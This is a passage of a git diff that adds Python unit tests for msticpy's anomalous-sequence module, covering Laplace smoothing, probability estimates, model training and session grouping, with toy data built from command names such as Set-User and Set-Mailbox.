+        self.data2["seq1_counts_ls"] = {UNK_TOKEN: 4, START_TOKEN: 3, END_TOKEN: 3}
+        self.data2["seq2_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data2["seq2_counts"][START_TOKEN][END_TOKEN] = 1
+        self.data2["seq2_counts_ls"] = {
+            START_TOKEN: {END_TOKEN: 2, UNK_TOKEN: 1},
+            UNK_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1},
+        }
+        self.data2["param_counts"] = defaultdict(lambda: 0)
+        self.data2["param_counts_ls"] = {UNK_TOKEN: 3}
+        self.data2["cmd_param_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data2["cmd_param_counts_ls"] = {
+            START_TOKEN: {UNK_TOKEN: 1},
+            END_TOKEN: {UNK_TOKEN: 1},
+            UNK_TOKEN: {UNK_TOKEN: 1},
+        }
+        self.data2["value_counts"] = defaultdict(lambda: 0)
+        self.data2["value_counts_ls"] = {UNK_TOKEN: 1}
+        self.data2["param_value_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data2["param_value_counts_ls"] = {UNK_TOKEN: {UNK_TOKEN: 1}}
+        self.data2["cmds"] = [START_TOKEN, END_TOKEN, UNK_TOKEN]
+        self.data2["params"] = [UNK_TOKEN]
+
+        # populate data3
+        cmd = "Set-User"
+        self.data3["sessions"] = [
+            [
+                Cmd(name="Set-User", params={"City": "york", "Identity": "blah"}),
+                Cmd(name="Set-User", params={"Identity": "blah"}),
+            ]
+        ]
+        self.data3["seq1_counts"] = defaultdict(
+            lambda: 0, {START_TOKEN: 1, cmd: 2, END_TOKEN: 1}
+        )
+        self.data3["seq1_counts_ls"] = {
+            UNK_TOKEN: 6,
+            START_TOKEN: 4,
+            END_TOKEN: 4,
+            cmd: 8,
+        }
+        self.data3["seq2_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data3["seq2_counts"][START_TOKEN][cmd] = 1
+        self.data3["seq2_counts"][cmd][cmd] = 1
+        self.data3["seq2_counts"][cmd][END_TOKEN] = 1
+        self.data3["seq2_counts_ls"] = {
+            START_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1, cmd: 2},
+            UNK_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1, cmd: 1},
+            cmd: {cmd: 2, END_TOKEN: 2, UNK_TOKEN: 1},
+        }
+        self.data3["param_counts"] = defaultdict(lambda: 0, {"City": 1, "Identity": 2})
+        self.data3["param_counts_ls"] = {UNK_TOKEN: 4, "City": 2, "Identity": 3}
+        self.data3["cmd_param_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data3["cmd_param_counts"][cmd]["City"] = 1
+        self.data3["cmd_param_counts"][cmd]["Identity"] = 2
+        self.data3["cmd_param_counts_ls"] = {
+            START_TOKEN: {UNK_TOKEN: 1},
+            END_TOKEN: {UNK_TOKEN: 1},
+            UNK_TOKEN: {UNK_TOKEN: 1},
+            cmd: {"City": 2, "Identity": 3, UNK_TOKEN: 1},
+        }
+        self.data3["value_counts"] = defaultdict(lambda: 0, {"york": 1, "blah": 2})
+        self.data3["value_counts_ls"] = {"york": 2, "blah": 3, UNK_TOKEN: 3}
+        self.data3["param_value_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data3["param_value_counts"]["City"]["york"] = 1
+        self.data3["param_value_counts"]["Identity"]["blah"] = 2
+        self.data3["param_value_counts_ls"] = {
+            "City": {"york": 2, UNK_TOKEN: 1},
+            "Identity": {"blah": 3, UNK_TOKEN: 1},
+            UNK_TOKEN: {UNK_TOKEN: 1},
+        }
+        self.data3["cmds"] = [START_TOKEN, END_TOKEN, UNK_TOKEN, cmd]
+        self.data3["params"] = [UNK_TOKEN, "City", "Identity"]
+
+    def tearDown(self):
+        self.data1 = None
+        self.data2 = None
+        self.data3 = None
+
+    def test_laplace_smooth_cmd_counts(self):
+        seq1_ls_actual, seq2_ls_actual = laplace_smooth.laplace_smooth_cmd_counts(
+            seq1_counts=self.data1["seq1_counts"],
+            seq2_counts=self.data1["seq2_counts"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_ls_actual, self.data1["seq1_counts_ls"])
+        self.assertDictEqual(seq2_ls_actual, self.data1["seq2_counts_ls"])
+
+        seq1_ls_actual, seq2_ls_actual = laplace_smooth.laplace_smooth_cmd_counts(
+            seq1_counts=self.data2["seq1_counts"],
+            seq2_counts=self.data2["seq2_counts"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_ls_actual, self.data2["seq1_counts_ls"])
+        self.assertDictEqual(seq2_ls_actual, self.data2["seq2_counts_ls"])
+
+        seq1_ls_actual, seq2_ls_actual = laplace_smooth.laplace_smooth_cmd_counts(
+            seq1_counts=self.data3["seq1_counts"],
+            seq2_counts=self.data3["seq2_counts"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_ls_actual, self.data3["seq1_counts_ls"])
+        self.assertDictEqual(seq2_ls_actual, self.data3["seq2_counts_ls"])
+
+    def test_laplace_smooth_param_counts(self):
+        (
+            param_ls_actual,
+            cmd_param_ls_actual,
+        ) = laplace_smooth.laplace_smooth_param_counts(
+            cmds=self.data1["cmds"],
+            param_counts=self.data1["param_counts"],
+            cmd_param_counts=self.data1["cmd_param_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(param_ls_actual, self.data1["param_counts_ls"])
+        self.assertDictEqual(cmd_param_ls_actual, self.data1["cmd_param_counts_ls"])
+
+        (
+            param_ls_actual,
+            cmd_param_ls_actual,
+        ) = laplace_smooth.laplace_smooth_param_counts(
+            cmds=self.data2["cmds"],
+            param_counts=self.data2["param_counts"],
+            cmd_param_counts=self.data2["cmd_param_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(param_ls_actual, self.data2["param_counts_ls"])
+        self.assertDictEqual(cmd_param_ls_actual, self.data2["cmd_param_counts_ls"])
+
+        (
+            param_ls_actual,
+            cmd_param_ls_actual,
+        ) = laplace_smooth.laplace_smooth_param_counts(
+            cmds=self.data3["cmds"],
+            param_counts=self.data3["param_counts"],
+            cmd_param_counts=self.data3["cmd_param_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(param_ls_actual, self.data3["param_counts_ls"])
+        self.assertDictEqual(cmd_param_ls_actual, self.data3["cmd_param_counts_ls"])
+
+    def test_laplace_smooth_value_counts(self):
+        (
+            values_ls_actual,
+            param_value_ls_actual,
+        ) = laplace_smooth.laplace_smooth_value_counts(
+            params=self.data1["params"],
+            value_counts=self.data1["value_counts"],
+            param_value_counts=self.data1["param_value_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(values_ls_actual, self.data1["value_counts_ls"])
+        self.assertDictEqual(param_value_ls_actual, self.data1["param_value_counts_ls"])
+
+        (
+            values_ls_actual,
+            param_value_ls_actual,
+        ) = laplace_smooth.laplace_smooth_value_counts(
+            params=self.data2["params"],
+            value_counts=self.data2["value_counts"],
+            param_value_counts=self.data2["param_value_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(values_ls_actual, self.data2["value_counts_ls"])
+        self.assertDictEqual(param_value_ls_actual, self.data2["param_value_counts_ls"])
+
+        (
+            values_ls_actual,
+            param_value_ls_actual,
+        ) = laplace_smooth.laplace_smooth_value_counts(
+            params=self.data3["params"],
+            value_counts=self.data3["value_counts"],
+            param_value_counts=self.data3["param_value_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(values_ls_actual, self.data3["value_counts_ls"])
+        self.assertDictEqual(param_value_ls_actual, self.data3["param_value_counts_ls"])
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/analysis/test_anom_seq_model.py b/tests/analysis/test_anom_seq_model.py
new file mode 100644
index 000000000..74e30aa7b
--- /dev/null
+++ b/tests/analysis/test_anom_seq_model.py
@@ -0,0 +1,174 @@
+import unittest
+
+from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd
+from msticpy.analysis.anomalous_sequence.model import Model
+from msticpy.common.exceptions import MsticpyException
+
+
+class TestModel(unittest.TestCase):
+    def setUp(self) -> None:
+        self.sessions1 = [
+            ["Set-User", "Set-User"],
+            ["Set-Mailbox", "Set-User", "Set-User"],
+        ]
+        self.sessions2 = [
+            [
+                Cmd("Set-User", {"Identity"}),
+                Cmd("Set-User", {"Identity", "City", "Name"}),
+            ],
+            [
+                Cmd("Set-Mailbox", {"Identity"}),
+                Cmd("Set-User", {"Identity", "City"}),
+                Cmd("Set-User", {"Identity"}),
+            ],
+        ]
+        self.sessions3 = [
+            [
+                Cmd("Set-User", {"Identity": "blah"}),
+                Cmd("Set-User", {"Identity": "haha", "City": "york", "Name": "bob"}),
+            ],
+            [
+                Cmd("Set-Mailbox", {"Identity": "blah"}),
+                Cmd("Set-User", {"Identity": "blah", "City": "london"}),
+                Cmd("Set-User", {"Identity": "haha"}),
+            ],
+        ]
+
+    def tearDown(self) -> None:
+        self.sessions1 = None
+        self.sessions2 = None
+        self.sessions3 = None
+
+    def test__init__(self):
+        self.assertRaises(MsticpyException, lambda: Model(sessions=[]))
+        self.assertRaises(MsticpyException, lambda: Model(sessions=[[]]))
+        self.assertRaises(MsticpyException, lambda: Model(sessions=["Set-User"]))
+        self.assertRaises(MsticpyException, lambda: Model(sessions=[["Set-User"], []]))
+        self.assertRaises(
+            Exception, lambda: Model(sessions=[[{"Set-User": {"Identity"}}]])
+        )
+
+    def test_train(self):
+        model = Model(sessions=self.sessions1)
+        model.train()
+        self.assertTrue(model.seq1_counts is not None)
+        self.assertTrue(model.seq2_counts is not None)
+        self.assertTrue(model.prior_probs is not None)
+        self.assertTrue(model.trans_probs is not None)
+        self.assertTrue(model.param_counts is None)
+        self.assertTrue(model.cmd_param_counts is None)
+        self.assertTrue(model.param_probs is None)
+        self.assertTrue(model.param_cond_cmd_probs is None)
+        self.assertTrue(model.value_counts is None)
+        self.assertTrue(model.param_value_counts is None)
+        self.assertTrue(model.value_probs is None)
+        self.assertTrue(model.value_cond_param_probs is None)
+        self.assertTrue(model.modellable_params is None)
+
+        model = Model(sessions=self.sessions2)
+        model.train()
+        self.assertTrue(model.seq1_counts is not None)
+        self.assertTrue(model.seq2_counts is not None)
+        self.assertTrue(model.prior_probs is not None)
+        self.assertTrue(model.trans_probs is not None)
+        self.assertTrue(model.param_counts is not None)
+        self.assertTrue(model.cmd_param_counts is not None)
+        self.assertTrue(model.param_probs is not None)
+        self.assertTrue(model.param_cond_cmd_probs is not None)
+        self.assertTrue(model.value_counts is None)
+        self.assertTrue(model.param_value_counts is None)
+        self.assertTrue(model.value_probs is None)
+        self.assertTrue(model.value_cond_param_probs is None)
+        self.assertTrue(model.modellable_params is None)
+
+        model = Model(sessions=self.sessions3)
+        model.train()
+        self.assertTrue(model.seq1_counts is not None)
+        self.assertTrue(model.seq2_counts is not None)
+        self.assertTrue(model.prior_probs is not None)
+        self.assertTrue(model.trans_probs is not None)
+        self.assertTrue(model.param_counts is not None)
+        self.assertTrue(model.cmd_param_counts is not None)
+        self.assertTrue(model.param_probs is not None)
+        self.assertTrue(model.param_cond_cmd_probs is not None)
+        self.assertTrue(model.value_counts is not None)
+        self.assertTrue(model.param_value_counts is not None)
+        self.assertTrue(model.value_probs is not None)
+        self.assertTrue(model.value_cond_param_probs is not None)
+        self.assertTrue(model.modellable_params is not None)
+
+    def test_compute_setof_params_cond_cmd(self):
+        model = Model(sessions=self.sessions1)
+        model.train()
+        self.assertRaises(
+            Exception, lambda: model.compute_setof_params_cond_cmd(use_geo_mean=False)
+        )
+
+        model = Model(sessions=self.sessions2)
+        model.train()
+        model.compute_setof_params_cond_cmd(use_geo_mean=False)
+        self.assertTrue(len(model.set_params_cond_cmd_probs) > 0)
+
+        model = Model(sessions=self.sessions3)
+        model.train()
+        model.compute_setof_params_cond_cmd(use_geo_mean=False)
+        self.assertTrue(len(model.set_params_cond_cmd_probs) > 0)
+
+        model = Model(sessions=self.sessions3)
+        self.assertRaises(
+            Exception, lambda: model.compute_setof_params_cond_cmd(use_geo_mean=False)
+        )
+
+    def test_compute_scores(self):
+        model = Model(sessions=self.sessions3)
+        self.assertRaises(
+            MsticpyException, lambda: model.compute_scores(use_start_end_tokens=True)
+        )
+
+        model.train()
+        model.compute_scores(use_start_end_tokens=True)
+        self.assertTrue(model.session_likelihoods is not None)
+        self.assertTrue(model.session_geomean_likelihoods is not None)
+        self.assertTrue(2 in model.rare_window_likelihoods)
+        self.assertTrue(3 in model.rare_window_likelihoods)
+        self.assertTrue(2 in model.rare_windows)
+        self.assertTrue(3 in model.rare_windows)
+
+    def test_compute_likelihoods_of_sessions(self):
+        model = Model(sessions=self.sessions3)
+        self.assertRaises(
+            MsticpyException,
+            lambda: model.compute_likelihoods_of_sessions(use_start_end_tokens=True),
+        )
+
+        model.train()
+        model.compute_likelihoods_of_sessions(use_start_end_tokens=True)
+        self.assertTrue(model.session_likelihoods is not None)
+
+    def test_compute_rarest_windows(self):
+        model = Model(sessions=self.sessions2)
+        self.assertRaises(
+            MsticpyException,
+            lambda: model.compute_rarest_windows(
+                window_len=3, use_start_end_tokens=True, use_geo_mean=False
+            ),
+        )
+
+        model.train()
+        model.compute_rarest_windows(
+            window_len=3, use_start_end_tokens=True, use_geo_mean=False
+        )
+        self.assertTrue(3 in model.rare_window_likelihoods)
+        self.assertTrue(3 in model.rare_windows)
+
+        model = Model(sessions=self.sessions2)
+        model.train()
+        model.compute_rarest_windows(
+            window_len=3, use_start_end_tokens=True, use_geo_mean=True
+        )
+        self.assertTrue(3 in model.rare_window_likelihoods_geo)
+        self.assertTrue(3 in model.rare_windows_geo)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/analysis/test_anom_seq_probabilities.py b/tests/analysis/test_anom_seq_probabilities.py
new file mode 100644
index 000000000..793547dc5
--- /dev/null
+++ b/tests/analysis/test_anom_seq_probabilities.py
@@ -0,0 +1,292 @@
+import unittest
+
+from msticpy.analysis.anomalous_sequence.utils import probabilities
+from msticpy.analysis.anomalous_sequence.utils.data_structures import StateMatrix, Cmd
+
+START_TOKEN = "##START##"
+END_TOKEN = "##END##"
+UNK_TOKEN = "##UNK##"
+
+
+class TestProbabilities(unittest.TestCase):
+    """
+    Test probabilities module.
+
+    Note that when modelling the params:
+
+    We make the modelling assumption that the parameters are independent
+    Bernoulii random variables conditional on the command.
+
+    Note also that because multiple parameters can appear at a time for
+    a command, and because we are computing the probability that each
+    parameter is present or not, we do NOT expect the probabilities to
+    sum to 1.
+
+    Note also that we use laplace smoothing in the counting
+    stage of the calculations. Therefore if you have parameter p which
+    appeared for every occurrence of command c, the resulting
+    probability for param p appearing conditional on command c would
+    NOT equal 1. It would be slightly less due to the laplace smoothing.
+
+    """
+
+    def setUp(self):
+        self.data1 = dict()
+        self.data2 = dict()
+        self.data3 = dict()
+
+        # populate data1
+        self.data1["sessions"] = []
+        self.data1["seq1_counts"] = StateMatrix({UNK_TOKEN: 2}, UNK_TOKEN)
+        self.data1["seq2_counts"] = StateMatrix({UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN)
+        self.data1["param_counts"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["cmd_param_counts"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+        self.data1["value_counts"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["param_value_counts"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+        self.data1["prior_probs"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["trans_probs"] = StateMatrix({UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN)
+        self.data1["param_probs"] = StateMatrix({UNK_TOKEN: 0.5}, UNK_TOKEN)
+        self.data1["param_cond_cmd_probs"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 0.5}}, UNK_TOKEN
+        )
+        self.data1["value_probs"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["value_cond_param_probs"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+
+        # populate data2
+        self.data2["sessions"] = [[]]
+        self.data2["seq1_counts"] = StateMatrix(
+            {UNK_TOKEN: 4, START_TOKEN: 3, END_TOKEN: 3}, UNK_TOKEN
+        )
+        self.data2["seq2_counts"] = StateMatrix(
+            {
+                START_TOKEN: {END_TOKEN: 2, UNK_TOKEN: 1},
+                UNK_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["param_counts"] = StateMatrix({UNK_TOKEN: 3}, UNK_TOKEN)
+        self.data2["cmd_param_counts"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 1},
+                END_TOKEN: {UNK_TOKEN: 1},
+                UNK_TOKEN: {UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["value_counts"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data2["param_value_counts"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+        self.data2["prior_probs"] = StateMatrix(
+            {START_TOKEN: 0.3, END_TOKEN: 0.3, UNK_TOKEN: 0.4}, UNK_TOKEN
+        )
+        self.data2["trans_probs"] = StateMatrix(
+            {
+                START_TOKEN: {
+                    END_TOKEN: 0.6666666666666666,
+                    UNK_TOKEN: 0.3333333333333333,
+                },
+                UNK_TOKEN: {END_TOKEN: 0.5, UNK_TOKEN: 0.5},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["param_probs"] = StateMatrix({UNK_TOKEN: 0.3}, UNK_TOKEN)
+        self.data2["param_cond_cmd_probs"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 0.3333333333333333},
+                END_TOKEN: {UNK_TOKEN: 0.3333333333333333},
+                UNK_TOKEN: {UNK_TOKEN: 0.25},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["value_probs"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data2["value_cond_param_probs"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+
+        # populate data3
+        cmd = "Set-User"
+        self.data3["sessions"] = [
+            [
+                Cmd(name="Set-User", params={"City": "york", "Identity": "blah"}),
+                Cmd(name="Set-User", params={"Identity": "blah"}),
+            ]
+        ]
+        self.data3["seq1_counts"] = StateMatrix(
+            {UNK_TOKEN: 6, START_TOKEN: 4, END_TOKEN: 4, cmd: 8}, UNK_TOKEN
+        )
+        self.data3["seq2_counts"] = StateMatrix(
+            {
+                START_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1, cmd: 2},
+                UNK_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1, cmd: 1},
+                cmd: {cmd: 2, END_TOKEN: 2, UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["param_counts"] = StateMatrix(
+            {UNK_TOKEN: 4, "City": 2, "Identity": 3}, UNK_TOKEN
+        )
+        self.data3["cmd_param_counts"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 1},
+                END_TOKEN: {UNK_TOKEN: 1},
+                UNK_TOKEN: {UNK_TOKEN: 1},
+                cmd: {"City": 2, "Identity": 3, UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["value_counts"] = StateMatrix(
+            {"york": 2, "blah": 3, UNK_TOKEN: 3}, UNK_TOKEN
+        )
+        self.data3["param_value_counts"] = StateMatrix(
+            {
+                "City": {"york": 2, UNK_TOKEN: 1},
+                "Identity": {"blah": 3, UNK_TOKEN: 1},
+                UNK_TOKEN: {UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["prior_probs"] = StateMatrix(
+            {
+                START_TOKEN: 0.18181818181818182,
+                END_TOKEN: 0.18181818181818182,
+                UNK_TOKEN: 0.2727272727272727,
+                cmd: 0.36363636363636365,
+            },
+            UNK_TOKEN,
+        )
+        self.data3["trans_probs"] = StateMatrix(
+            {
+                START_TOKEN: {END_TOKEN: 0.25, UNK_TOKEN: 0.25, cmd: 0.5},
+                UNK_TOKEN: {END_TOKEN: 1 / 3, UNK_TOKEN: 1 / 3, cmd: 1 / 3},
+                cmd: {END_TOKEN: 0.4, UNK_TOKEN: 0.2, cmd: 0.4},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["param_probs"] = StateMatrix(
+            {
+                UNK_TOKEN: 0.18181818181818182,
+                "Identity": 0.13636363636363635,
+                "City": 0.09090909090909091,
+            },
+            UNK_TOKEN,
+        )
+        self.data3["param_cond_cmd_probs"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 0.25},
+                END_TOKEN: {UNK_TOKEN: 0.25},
+                UNK_TOKEN: {UNK_TOKEN: 0.16666666666666666},
+                cmd: {"City": 0.25, "Identity": 0.375, UNK_TOKEN: 0.125},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["value_probs"] = StateMatrix(
+            {"york": 0.25, "blah": 0.375, UNK_TOKEN: 0.375}, UNK_TOKEN
+        )
+        self.data3["value_cond_param_probs"] = StateMatrix(
+            {
+                "City": {"york": 0.6666666666666666, UNK_TOKEN: 0.3333333333333333},
+                "Identity": {"blah": 0.75, UNK_TOKEN: 0.25},
+                UNK_TOKEN: {UNK_TOKEN: 1.0},
+            },
+            UNK_TOKEN,
+        )
+
+    def tearDown(self):
+        self.data1 = None
+        self.data2 = None
+        self.data3 = None
+
+    def test_compute_cmds_probs(self):
+        seq1_actual, seq2_actual = probabilities.compute_cmds_probs(
+            seq1_counts=self.data1["seq1_counts"],
+            seq2_counts=self.data1["seq2_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_actual, self.data1["prior_probs"])
+        self.assertDictEqual(seq2_actual, self.data1["trans_probs"])
+
+        seq1_actual, seq2_actual = probabilities.compute_cmds_probs(
+            seq1_counts=self.data2["seq1_counts"],
+            seq2_counts=self.data2["seq2_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_actual, self.data2["prior_probs"])
+        self.assertDictEqual(seq2_actual, self.data2["trans_probs"])
+
+        seq1_actual, seq2_actual = probabilities.compute_cmds_probs(
+            seq1_counts=self.data3["seq1_counts"],
+            seq2_counts=self.data3["seq2_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_actual, self.data3["prior_probs"])
+        self.assertDictEqual(seq2_actual, self.data3["trans_probs"])
+
+    def test_compute_params_probs(self):
+        param_actual, param_cond_cmd_actual = probabilities.compute_params_probs(
+            param_counts=self.data1["param_counts"],
+            cmd_param_counts=self.data1["cmd_param_counts"],
+            seq1_counts=self.data1["seq1_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(param_actual, self.data1["param_probs"])
+        self.assertDictEqual(param_cond_cmd_actual, self.data1["param_cond_cmd_probs"])
+
+        param_actual, param_cond_cmd_actual = probabilities.compute_params_probs(
+            param_counts=self.data2["param_counts"],
+            cmd_param_counts=self.data2["cmd_param_counts"],
+            seq1_counts=self.data2["seq1_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(param_actual, self.data2["param_probs"])
+        self.assertDictEqual(param_cond_cmd_actual, self.data2["param_cond_cmd_probs"])
+
+        param_actual, param_cond_cmd_actual = probabilities.compute_params_probs(
+            param_counts=self.data3["param_counts"],
+            cmd_param_counts=self.data3["cmd_param_counts"],
+            seq1_counts=self.data3["seq1_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(param_actual, self.data3["param_probs"])
+        self.assertDictEqual(param_cond_cmd_actual, self.data3["param_cond_cmd_probs"])
+
+    def test_compute_values_probs(self):
+        value_actual, value_cond_param_actual = probabilities.compute_values_probs(
+            value_counts=self.data1["value_counts"],
+            param_value_counts=self.data1["param_value_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(value_actual, self.data1["value_probs"])
+        self.assertDictEqual(
+            value_cond_param_actual, self.data1["value_cond_param_probs"]
+        )
+
+        value_actual, value_cond_param_actual = probabilities.compute_values_probs(
+            value_counts=self.data2["value_counts"],
+            param_value_counts=self.data2["param_value_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(value_actual, self.data2["value_probs"])
+        self.assertDictEqual(
+            value_cond_param_actual, self.data2["value_cond_param_probs"]
+        )
+
+        value_actual, value_cond_param_actual = probabilities.compute_values_probs(
+            value_counts=self.data3["value_counts"],
+            param_value_counts=self.data3["param_value_counts"],
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(value_actual, self.data3["value_probs"])
+        self.assertDictEqual(
+            value_cond_param_actual, self.data3["value_cond_param_probs"]
+        )
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/analysis/test_anom_sessionize.py b/tests/analysis/test_anom_sessionize.py
new file mode 100644
index 000000000..c18c5e256
--- /dev/null
+++ b/tests/analysis/test_anom_sessionize.py
@@ -0,0 +1,263 @@
+import unittest
+
+import pandas as pd
+import numpy as np
+from pandas.testing import assert_frame_equal
+
+from msticpy.analysis.anomalous_sequence import sessionize
+
+
+class TestSessionize(unittest.TestCase):
+    def setUp(self):
+        self.df1 = pd.DataFrame({"UserId": [], "time": [], "operation": []})
+        self.df1_with_ses_col = pd.DataFrame(
+            {"UserId": [], "time": [], "operation": [], "session_ind": []}
+        )
+        self.df1_sessionized = pd.DataFrame(
+            {
+                "UserId": [],
+                "time_min": [],
+                "time_max": [],
+                "operation_list": [],
+                "duration": [],
+                "number_events": [],
+            }
+        )
+        self.df2 = pd.DataFrame(
+            {
+                "UserId": [1, 1, 2, 3, 1, 2, 2],
+                "time": [
+                    pd.to_datetime("2020-01-03 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-03 00:01:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-06 11:06:00", utc=True),
+                    pd.to_datetime("2020-01-03 01:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:21:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:25:00", utc=True),
+                ],
+                "operation": ["A", "B", "C", "A", "A", "B", "C"],
+            }
+        )
+        self.df2_with_ses_col_1 = pd.DataFrame(
+            {
+                "UserId": [1, 1, 1, 2, 2, 2, 3],
+                "time": [
+                    pd.to_datetime("2020-01-03 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-03 00:01:00", utc=True),
+                    pd.to_datetime("2020-01-03 01:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:21:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:25:00", utc=True),
+                    pd.to_datetime("2020-01-06 11:06:00", utc=True),
+                ],
+                "operation": ["A", "B", "A", "C", "B", "C", "A"],
+                "session_ind": [0, 0, 1, 2, 3, 4, 5],
+            }
+        )
+        self.df2_sessionized_1 = pd.DataFrame(
+            {
+                "UserId": [1, 1, 2, 2, 2, 3],
+                "time_min": [
+                    pd.to_datetime("2020-01-03 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-03 01:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:21:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:25:00", utc=True),
+                    pd.to_datetime("2020-01-06 11:06:00", utc=True),
+                ],
+                "time_max": [
+                    pd.to_datetime("2020-01-03 00:01:00", utc=True),
+                    pd.to_datetime("2020-01-03 01:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:21:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:25:00", utc=True),
+                    pd.to_datetime("2020-01-06 11:06:00", utc=True),
+                ],
+                "operation_list": [["A", "B"], ["A"], ["C"], ["B"], ["C"], ["A"]],
+                "duration": [
+                    pd.to_timedelta(1, "min"),
+                    pd.to_timedelta(0, "min"),
+                    pd.to_timedelta(0, "min"),
+                    pd.to_timedelta(0, "min"),
+                    pd.to_timedelta(0, "min"),
+                    pd.to_timedelta(0, "min"),
+                ],
+                "number_events": [2, 1, 1, 1, 1, 1],
+            }
+        )
+        self.df2_with_ses_col_2 = pd.DataFrame(
+            {
+                "UserId": [1, 1, 1, 2, 2, 2, 3],
+                "time": [
+                    pd.to_datetime("2020-01-03 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-03 00:01:00", utc=True),
+                    pd.to_datetime("2020-01-03 01:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:21:00", utc=True),
+                    pd.to_datetime("2020-01-05 00:25:00", utc=True),
+                    pd.to_datetime("2020-01-06 11:06:00", utc=True),
+                ],
+                "operation": ["A", "B", "A", "C", "B", "C", "A"],
+                "session_ind": [0, 0, 1, 2, 3, 3, 4],
+            }
+        )
+        self.df2_sessionized_2 = pd.DataFrame(
+            {
+                "UserId": [1, 1, 2, 2, 3],
+                "time_min": [
+                    pd.to_datetime("2020-01-03 00:00:00", utc=True),
+                    pd.to_datetime("2020-01-03 01:00:00", utc=True),
